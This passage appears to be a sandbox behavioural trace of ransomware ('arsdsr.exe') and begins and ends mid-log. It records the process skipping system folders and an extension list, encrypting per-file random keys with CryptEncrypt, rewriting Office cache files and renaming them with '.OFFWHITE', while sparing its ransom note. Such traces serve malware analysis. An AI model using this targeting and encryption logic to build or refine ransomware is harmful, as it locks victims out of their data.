dwReserved1=0x295f070, cFileName="Setup.xml", cAlternateFileName="")) returned 1 [0084.030] lstrcmpiW (lpString1="Setup.xml", lpString2=".") returned 1 [0084.030] lstrcmpiW (lpString1="Setup.xml", lpString2="..") returned 1 [0084.030] lstrcmpiW (lpString1="Setup.xml", lpString2="...") returned 1 [0084.030] lstrcmpiW (lpString1="Setup.xml", lpString2="windows") returned -1 [0084.030] lstrcmpiW (lpString1="Setup.xml", lpString2="$recycle.bin") returned 1 [0084.030] lstrcmpiW (lpString1="Setup.xml", lpString2="rsa") returned 1 [0084.030] lstrcmpiW (lpString1="Setup.xml", lpString2="ntuser.dat") returned 1 [0084.030] lstrcmpiW (lpString1="Setup.xml", lpString2="programdata") returned 1 [0084.030] lstrcmpiW (lpString1="Setup.xml", lpString2="appdata") returned 1 [0084.030] lstrcmpiW (lpString1="Setup.xml", lpString2="program files") returned 1 [0084.030] lstrcmpiW (lpString1="Setup.xml", lpString2="program files (x86)") returned 1 [0084.030] lstrcpyW (in: lpString1=0x295e7e8, lpString2="C:/MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\" | out: lpString1="C:/MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\") returned="C:/MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\" [0084.030] lstrcatW (in: lpString1="C:/MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\", lpString2="Setup.xml" | out: lpString1="C:/MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml") returned="C:/MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml" [0084.030] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0084.030] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0084.030] PathFindExtensionW (pszPath="Setup.xml") returned=".xml" [0084.031] lstrcmpiW (lpString1=".xml", lpString2=".exe") returned 1 [0084.031] lstrcmpiW (lpString1=".xml", lpString2=".log") returned 1 [0084.031] lstrcmpiW (lpString1=".xml", lpString2=".cab") returned 1 [0084.031] lstrcmpiW (lpString1=".xml", lpString2=".cmd") returned 1 [0084.031] lstrcmpiW (lpString1=".xml", lpString2=".com") returned 1 [0084.031] lstrcmpiW (lpString1=".xml", lpString2=".cpl") returned 1 [0084.031] lstrcmpiW (lpString1=".xml", lpString2=".ini") returned 1 [0084.031] lstrcmpiW (lpString1=".xml", lpString2=".dll") returned 1 [0084.031] lstrcmpiW (lpString1=".xml", lpString2=".url") returned 1 [0084.031] lstrcmpiW (lpString1=".xml", lpString2=".ttf") returned 1 [0084.031] lstrcmpiW (lpString1=".xml", lpString2=".mp3") returned 1 [0084.031] lstrcmpiW (lpString1=".xml", lpString2=".pif") returned 1 [0084.031] lstrcmpiW (lpString1=".xml", lpString2=".mp4") returned 1 [0084.031] lstrcmpiW (lpString1=".xml", lpString2=".OFFWHITE") returned 1 [0084.031] lstrcmpiW (lpString1=".xml", lpString2=".msi") returned 1 [0084.031] lstrcmpiW (lpString1="Setup.xml", lpString2="OFFWHITE-MANUAL.txt") returned 1 [0084.031] GetProcessHeap () returned 0x500000 [0084.031] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x52bad0 [0084.031] CreateFileW (lpFileName="C:/MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x21c [0084.032] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x295e560 | out: lpFileSize=0x295e560*=2424) returned 1 [0084.032] GetProcessHeap () returned 0x500000 [0084.032] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x548778 [0084.032] GetProcessHeap () returned 0x500000 [0084.032] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x548790 [0084.032] GetProcessHeap () returned 0x500000 [0084.032] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5240a0 [0084.032] GetProcessHeap () returned 0x500000 [0084.032] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5241a8 [0084.032] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0084.032] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0084.032] SystemFunction036 (in: RandomBuffer=0x548778, RandomBufferLength=0x10 | out: RandomBuffer=0x548778) returned 1 [0084.032] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0084.032] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0084.032] SystemFunction036 (in: RandomBuffer=0x548790, RandomBufferLength=0x10 | out: RandomBuffer=0x548790) returned 1 [0084.032] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0084.032] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0084.032] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5240a0*, pdwDataLen=0x295e310*=0x10, dwBufLen=0x100 | out: pbData=0x5240a0*, pdwDataLen=0x295e310*=0x100) returned 1 [0084.033] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0084.033] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0084.033] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5241a8*, pdwDataLen=0x295e30c*=0x10, dwBufLen=0x100 | out: pbData=0x5241a8*, pdwDataLen=0x295e30c*=0x100) returned 1 [0084.033] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x978, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.033] SetLastError (dwErrCode=0x0) [0084.033] WriteFile (in: hFile=0x21c, lpBuffer=0x5240a0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x5240a0*, lpNumberOfBytesWritten=0x295e54c*=0x100, lpOverlapped=0x0) returned 1 [0084.039] GetLastError () returned 0x0 [0084.039] GetLastError () returned 0x0 [0084.039] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xa78, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.039] WriteFile (in: hFile=0x21c, lpBuffer=0x5241a8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x5241a8*, lpNumberOfBytesWritten=0x295e54c*=0x100, lpOverlapped=0x0) returned 1 [0084.039] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xb78, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.039] WriteFile (in: hFile=0x21c, lpBuffer=0x52bad0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x52bad0*, lpNumberOfBytesWritten=0x295e54c*=0x8, lpOverlapped=0x0) returned 1 [0084.039] GetProcessHeap () returned 0x500000 [0084.039] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x978) returned 0x526640 [0084.039] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.039] ReadFile (in: hFile=0x21c, lpBuffer=0x526640, nNumberOfBytesToRead=0x978, lpNumberOfBytesRead=0x295e540, lpOverlapped=0x0 | out: lpBuffer=0x526640*, lpNumberOfBytesRead=0x295e540*=0x978, lpOverlapped=0x0) returned 1 [0084.040] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.040] WriteFile (in: hFile=0x21c, lpBuffer=0x526640*, nNumberOfBytesToWrite=0x978, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x526640*, lpNumberOfBytesWritten=0x295e54c*=0x978, lpOverlapped=0x0) returned 1 [0084.040] GetProcessHeap () returned 0x500000 [0084.040] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x526640 | out: hHeap=0x500000) returned 1 [0084.040] CloseHandle (hObject=0x21c) returned 1 [0084.049] GetProcessHeap () returned 0x500000 [0084.049] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5240a0 | out: hHeap=0x500000) returned 1 [0084.049] GetProcessHeap () returned 0x500000 [0084.049] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5241a8 | out: hHeap=0x500000) returned 1 [0084.049] GetProcessHeap () returned 0x500000 [0084.049] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x548778 | out: hHeap=0x500000) returned 1 [0084.049] GetProcessHeap () returned 0x500000 [0084.049] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x548790 | out: hHeap=0x500000) returned 1 [0084.049] lstrcpyW (in: lpString1=0x295e338, lpString2="C:/MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml" | out: lpString1="C:/MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml") returned="C:/MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml" [0084.049] lstrcatW (in: lpString1="C:/MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml", lpString2=".OFFWHITE" | out: lpString1="C:/MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml.OFFWHITE") returned="C:/MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml.OFFWHITE" [0084.050] MoveFileW (lpExistingFileName="C:/MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\setup.xml"), lpNewFileName="C:/MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml.OFFWHITE" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\setup.xml.offwhite")) returned 1 [0084.053] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x2fb48f00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x2fb48f00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xfc967850, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x29c6dbd, dwReserved0=0x340032, dwReserved1=0x295f070, cFileName="WordLR.cab", cAlternateFileName="")) returned 1 [0084.053] lstrcmpiW (lpString1="WordLR.cab", lpString2=".") returned 1 [0084.053] lstrcmpiW (lpString1="WordLR.cab", lpString2="..") returned 1 [0084.053] lstrcmpiW (lpString1="WordLR.cab", lpString2="...") returned 1 [0084.053] lstrcmpiW (lpString1="WordLR.cab", lpString2="windows") returned 1 [0084.053] lstrcmpiW (lpString1="WordLR.cab", lpString2="$recycle.bin") returned 1 [0084.053] lstrcmpiW (lpString1="WordLR.cab", lpString2="rsa") returned 1 [0084.053] lstrcmpiW (lpString1="WordLR.cab", lpString2="ntuser.dat") returned 1 [0084.053] lstrcmpiW (lpString1="WordLR.cab", lpString2="programdata") returned 1 [0084.053] lstrcmpiW (lpString1="WordLR.cab", lpString2="appdata") returned 1 [0084.053] lstrcmpiW (lpString1="WordLR.cab", lpString2="program files") returned 1 [0084.053] lstrcmpiW (lpString1="WordLR.cab", lpString2="program files (x86)") returned 1 [0084.053] lstrcpyW (in: lpString1=0x295e7e8, lpString2="C:/MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\" | out: lpString1="C:/MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\") returned="C:/MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\" [0084.053] lstrcatW (in: lpString1="C:/MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\", lpString2="WordLR.cab" | out: lpString1="C:/MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab") returned="C:/MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab" [0084.053] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0084.053] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0084.053] PathFindExtensionW (pszPath="WordLR.cab") returned=".cab" [0084.053] lstrcmpiW (lpString1=".cab", lpString2=".exe") returned -1 [0084.053] lstrcmpiW (lpString1=".cab", lpString2=".log") returned -1 [0084.053] lstrcmpiW (lpString1=".cab", lpString2=".cab") returned 0 [0084.053] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x3e02ab00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x3e02ab00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xfc8a9170, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x267e00, dwReserved0=0x340032, dwReserved1=0x295f070, cFileName="WordMUI.msi", cAlternateFileName="")) returned 1 [0084.054] lstrcmpiW (lpString1="WordMUI.msi", lpString2=".") returned 1 [0084.054] lstrcmpiW (lpString1="WordMUI.msi", lpString2="..") returned 1 [0084.054] lstrcmpiW (lpString1="WordMUI.msi", lpString2="...") returned 1 [0084.054] lstrcmpiW (lpString1="WordMUI.msi", lpString2="windows") returned 1 [0084.054] lstrcmpiW (lpString1="WordMUI.msi", lpString2="$recycle.bin") returned 1 [0084.054] lstrcmpiW (lpString1="WordMUI.msi", lpString2="rsa") returned 1 [0084.054] lstrcmpiW (lpString1="WordMUI.msi", lpString2="ntuser.dat") returned 1 [0084.054] lstrcmpiW (lpString1="WordMUI.msi", lpString2="programdata") returned 1 [0084.054] lstrcmpiW (lpString1="WordMUI.msi", lpString2="appdata") returned 1 [0084.054] lstrcmpiW (lpString1="WordMUI.msi", lpString2="program files") returned 1 [0084.054] lstrcmpiW (lpString1="WordMUI.msi", lpString2="program files (x86)") returned 1 [0084.054] lstrcpyW (in: lpString1=0x295e7e8, lpString2="C:/MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\" | out: lpString1="C:/MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\") returned="C:/MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\" [0084.054] lstrcatW (in: lpString1="C:/MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\", lpString2="WordMUI.msi" | out: lpString1="C:/MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.msi") returned="C:/MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.msi" [0084.054] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0084.054] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0084.054] PathFindExtensionW (pszPath="WordMUI.msi") returned=".msi" [0084.054] lstrcmpiW (lpString1=".msi", lpString2=".exe") returned 1 [0084.054] lstrcmpiW (lpString1=".msi", lpString2=".log") returned 1 [0084.054] lstrcmpiW (lpString1=".msi", lpString2=".cab") returned 1 [0084.054] lstrcmpiW (lpString1=".msi", lpString2=".cmd") returned 1 [0084.054] lstrcmpiW (lpString1=".msi", lpString2=".com") returned 1 [0084.054] lstrcmpiW (lpString1=".msi", lpString2=".cpl") returned 1 [0084.054] lstrcmpiW (lpString1=".msi", lpString2=".ini") returned 1 [0084.054] lstrcmpiW (lpString1=".msi", lpString2=".dll") returned 1 [0084.054] lstrcmpiW (lpString1=".msi", lpString2=".url") returned -1 [0084.055] lstrcmpiW (lpString1=".msi", lpString2=".ttf") returned -1 [0084.055] lstrcmpiW (lpString1=".msi", lpString2=".mp3") returned 1 [0084.055] lstrcmpiW (lpString1=".msi", lpString2=".pif") returned -1 [0084.055] lstrcmpiW (lpString1=".msi", lpString2=".mp4") returned 1 [0084.055] lstrcmpiW (lpString1=".msi", lpString2=".OFFWHITE") returned -1 [0084.055] lstrcmpiW (lpString1=".msi", lpString2=".msi") returned 0 [0084.055] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x43f88c00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x43f88c00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xfc8a9170, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x708, dwReserved0=0x340032, dwReserved1=0x295f070, cFileName="WordMUI.xml", cAlternateFileName="")) returned 1 [0084.055] lstrcmpiW (lpString1="WordMUI.xml", lpString2=".") returned 1 [0084.055] lstrcmpiW (lpString1="WordMUI.xml", lpString2="..") returned 1 [0084.055] lstrcmpiW (lpString1="WordMUI.xml", lpString2="...") returned 1 [0084.055] lstrcmpiW (lpString1="WordMUI.xml", lpString2="windows") returned 1 [0084.055] lstrcmpiW (lpString1="WordMUI.xml", lpString2="$recycle.bin") returned 1 [0084.055] lstrcmpiW (lpString1="WordMUI.xml", lpString2="rsa") returned 1 [0084.055] lstrcmpiW (lpString1="WordMUI.xml", lpString2="ntuser.dat") returned 1 [0084.055] lstrcmpiW (lpString1="WordMUI.xml", lpString2="programdata") returned 1 [0084.055] lstrcmpiW (lpString1="WordMUI.xml", lpString2="appdata") returned 1 [0084.055] lstrcmpiW (lpString1="WordMUI.xml", lpString2="program files") returned 1 [0084.055] lstrcmpiW (lpString1="WordMUI.xml", lpString2="program files (x86)") returned 1 [0084.055] lstrcpyW (in: lpString1=0x295e7e8, lpString2="C:/MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\" | out: lpString1="C:/MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\") returned="C:/MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\" [0084.055] lstrcatW (in: lpString1="C:/MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\", lpString2="WordMUI.xml" | out: lpString1="C:/MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml") returned="C:/MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml" [0084.055] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0084.055] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0084.055] PathFindExtensionW (pszPath="WordMUI.xml") returned=".xml" [0084.055] lstrcmpiW (lpString1=".xml", lpString2=".exe") returned 1 [0084.056] lstrcmpiW (lpString1=".xml", lpString2=".log") returned 1 [0084.056] lstrcmpiW (lpString1=".xml", lpString2=".cab") returned 1 [0084.056] lstrcmpiW (lpString1=".xml", lpString2=".cmd") returned 1 [0084.056] lstrcmpiW (lpString1=".xml", lpString2=".com") returned 1 [0084.056] lstrcmpiW (lpString1=".xml", lpString2=".cpl") returned 1 [0084.056] lstrcmpiW (lpString1=".xml", lpString2=".ini") returned 1 [0084.056] lstrcmpiW (lpString1=".xml", lpString2=".dll") returned 1 [0084.056] lstrcmpiW (lpString1=".xml", lpString2=".url") returned 1 [0084.056] lstrcmpiW (lpString1=".xml", lpString2=".ttf") returned 1 [0084.056] lstrcmpiW (lpString1=".xml", lpString2=".mp3") returned 1 [0084.056] lstrcmpiW (lpString1=".xml", lpString2=".pif") returned 1 [0084.056] lstrcmpiW (lpString1=".xml", lpString2=".mp4") returned 1 [0084.056] lstrcmpiW (lpString1=".xml", lpString2=".OFFWHITE") returned 1 [0084.056] lstrcmpiW (lpString1=".xml", lpString2=".msi") returned 1 [0084.056] lstrcmpiW (lpString1="WordMUI.xml", lpString2="OFFWHITE-MANUAL.txt") returned 1 [0084.056] GetProcessHeap () returned 0x500000 [0084.056] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x52bac0 [0084.056] CreateFileW (lpFileName="C:/MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\wordmui.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x21c [0084.057] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x295e560 | out: lpFileSize=0x295e560*=1800) returned 1 [0084.057] GetProcessHeap () returned 0x500000 [0084.057] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x548790 [0084.057] GetProcessHeap () returned 0x500000 [0084.057] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x548778 [0084.057] GetProcessHeap () returned 0x500000 [0084.057] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5241a8 [0084.057] GetProcessHeap () returned 0x500000 [0084.057] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5240a0 [0084.057] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0084.057] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0084.057] SystemFunction036 (in: RandomBuffer=0x548790, RandomBufferLength=0x10 | out: RandomBuffer=0x548790) returned 1 [0084.057] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0084.057] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0084.057] SystemFunction036 (in: RandomBuffer=0x548778, RandomBufferLength=0x10 | out: RandomBuffer=0x548778) returned 1 [0084.057] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0084.057] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0084.057] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5241a8*, pdwDataLen=0x295e310*=0x10, dwBufLen=0x100 | out: pbData=0x5241a8*, pdwDataLen=0x295e310*=0x100) returned 1 [0084.058] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0084.058] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0084.058] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5240a0*, pdwDataLen=0x295e30c*=0x10, dwBufLen=0x100 | out: pbData=0x5240a0*, pdwDataLen=0x295e30c*=0x100) returned 1 [0084.058] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x708, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.058] SetLastError (dwErrCode=0x0) [0084.058] WriteFile (in: hFile=0x21c, lpBuffer=0x5241a8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x5241a8*, lpNumberOfBytesWritten=0x295e54c*=0x100, lpOverlapped=0x0) returned 1 [0084.063] GetLastError () returned 0x0 [0084.063] GetLastError () returned 0x0 [0084.063] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x808, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.063] WriteFile (in: hFile=0x21c, lpBuffer=0x5240a0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x5240a0*, lpNumberOfBytesWritten=0x295e54c*=0x100, lpOverlapped=0x0) returned 1 [0084.063] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x908, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.063] WriteFile (in: hFile=0x21c, lpBuffer=0x52bac0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x52bac0*, lpNumberOfBytesWritten=0x295e54c*=0x8, lpOverlapped=0x0) returned 1 [0084.063] GetProcessHeap () returned 0x500000 [0084.063] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x708) returned 0x546980 [0084.063] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.064] ReadFile (in: hFile=0x21c, lpBuffer=0x546980, nNumberOfBytesToRead=0x708, lpNumberOfBytesRead=0x295e540, lpOverlapped=0x0 | out: lpBuffer=0x546980*, lpNumberOfBytesRead=0x295e540*=0x708, lpOverlapped=0x0) returned 1 [0084.064] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.064] WriteFile (in: hFile=0x21c, lpBuffer=0x546980*, nNumberOfBytesToWrite=0x708, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x546980*, lpNumberOfBytesWritten=0x295e54c*=0x708, lpOverlapped=0x0) returned 1 [0084.064] GetProcessHeap () returned 0x500000 [0084.064] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x546980 | out: hHeap=0x500000) returned 1 [0084.064] CloseHandle (hObject=0x21c) returned 1 [0084.069] GetProcessHeap () returned 0x500000 [0084.069] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5241a8 | out: hHeap=0x500000) returned 1 [0084.069] GetProcessHeap () returned 0x500000 [0084.069] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5240a0 | out: hHeap=0x500000) returned 1 [0084.069] GetProcessHeap () returned 0x500000 [0084.069] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x548790 | out: hHeap=0x500000) returned 1 [0084.069] GetProcessHeap () returned 0x500000 [0084.069] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x548778 | out: hHeap=0x500000) returned 1 [0084.069] lstrcpyW (in: lpString1=0x295e338, lpString2="C:/MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml" | out: lpString1="C:/MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml") returned="C:/MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml" [0084.069] lstrcatW (in: lpString1="C:/MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml", lpString2=".OFFWHITE" | out: lpString1="C:/MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml.OFFWHITE") returned="C:/MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml.OFFWHITE" [0084.069] MoveFileW (lpExistingFileName="C:/MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\wordmui.xml"), lpNewFileName="C:/MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml.OFFWHITE" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\wordmui.xml.offwhite")) returned 1 [0084.070] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x43f88c00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x43f88c00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xfc8a9170, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x708, dwReserved0=0x340032, dwReserved1=0x295f070, cFileName="WordMUI.xml", cAlternateFileName="")) returned 0 [0084.070] FindClose (in: hFindFile=0x544610 | out: hFindFile=0x544610) returned 1 [0084.070] FindNextFileW (in: hFindFile=0x544690, lpFindFileData=0x295ec18 | out: 